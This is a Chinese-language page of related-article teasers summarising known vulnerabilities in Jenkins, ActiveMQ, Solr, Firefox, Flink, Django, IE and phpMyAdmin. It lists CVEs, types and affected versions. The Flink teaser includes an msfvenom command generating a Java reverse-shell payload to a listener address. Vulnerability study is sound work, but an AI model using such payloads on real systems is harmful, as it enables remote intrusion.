应用安全 - 工具|框架 - Java - Jenkins - 漏洞 - 汇总】的更多相关文章

应用安全 - 工具|框架 - Java - Jenkins - 漏洞 - 汇总

未授权访问 /script /manage/asynchPeople//config.xml CVE-2015-8103 Date 2015.11 类型反序列化导致远程命令执行 影响范围Jenkins jenkins 〈= LTS 1.625.1Jenkins jenkins 〈= 1.637 CVE-2016-0792 Date 类型 影响范围 CVE-2016-9299 Date 类型 影响范围 cve-2017-1000353 Date 类型远程命令执行 影响范围所有Jenkins主版本均…

常见Java库漏洞汇总

1.ActiveMQ 反序列化漏洞(CVE-2015-5254) ref:https://www.nanoxika.com/?p=408 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务.集群.Spring Framework等. Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类.远程攻击者可借助特制的序列化的Java Message Service(JMS…

应用安全 - Web框架 - Apache Solr - 漏洞汇总

CVE-2019-12409 Date: // 类型: 配置不当导致远程代码执行 前置条件: 影响范围: Solr and for Linux Solr下载:https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip Solr安装(默认端口8983): ~/solr-8.2.0/bin# ./solr -e dih -force Kali复现: Apache solr模板注入漏洞 CVE-2019-0193 Dat…

应用安全 - 工具 - 浏览器 - 火狐(FireFox) - 漏洞汇总

CVE-2010-3131   Date Aug 类型 Mozilla Firefox - 'dwmapi.dll' DLL Hijacking 影响范围 Firefox <= CVE-2010-1199 Date 2010-03-22  类型 Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability 影响范围Mozilla Firefox 3.6.x CVE-2010-3179 Date 类型缓冲区溢出导致远程代码执行 影响范围…

应用安全 - Web框架 - Apache Flink - 漏洞汇总

SSV ID:SSV-98101 -- 类型: 文件上传导致远程代码执行   flink下载: https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz flink安装 - 默认端口:8081 ./start-cluster.sh Shell生成: msfvenom -p java/shell_reverse_tcp LHOST=192.168.217.1 LPORT=6666 -…

应用安全 - 编程语言 | 框架 - PHP - Djiango - 漏洞 -汇总

CVE-2007-0404 Date , 类型Filename validation issue in translation framework. Full description 影响范围 CVE-2007-0405 Date January , 类型 Apparent “caching” of authenticated user. Full description Issues under Django’s security process¶All other security issu…

应用安全 - 工具 - 浏览器 - IE浏览器 - 漏洞汇总

CVE-2014-6332 Date 2014.11 CVE-2016-0189 | MS16-051 Date 2016年初 CVE-2018-8174…

应用安全 - Web框架 - 数据库管理 - phpMyAdmin - 漏洞汇总

CVE-2019-18622 Date: 2019.10.28 类型: SQL injection in Designer feature 影响范围: phpMyAdmin versions prior to are affected, at least . 修复: Upgrade to phpMyAdmin or newer or apply patch listed below for versions older than 4.9.2https://github.com/phpmyadmi…

java 导出 excel 最佳实践,java 大文件 excel 避免OOM(内存溢出) excel 工具框架

产品需求 产品经理需要导出一个页面的所有的信息到 EXCEL 文件. 需求分析 对于 excel 导出,是一个很常见的需求. 最常见的解决方案就是使用 poi 直接同步导出一个 excel 文件. 客户体验 & 服务性能 客户体验 如果导出的文件比较大,比如几十万条数据,同步导出页面就会卡主,用户无法进行其他操作. 服务性能 导出的时候,任务比较耗时就会阻塞主线程. 如果导出的服务是暴露给外部(前后端分离),这种大量的数据传输十分消耗性能. 解决方案 使用异常处理导出请求,后台 MQ 通知自己进…

Java反序列化漏洞分析

相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 http://www.tuicool.com/articles/ZvMbIne http://www.freebuf.com/vuls/86566.html http://sec.chinabyte.com/435/13618435.shtml http://www.myhack58.com/Articl…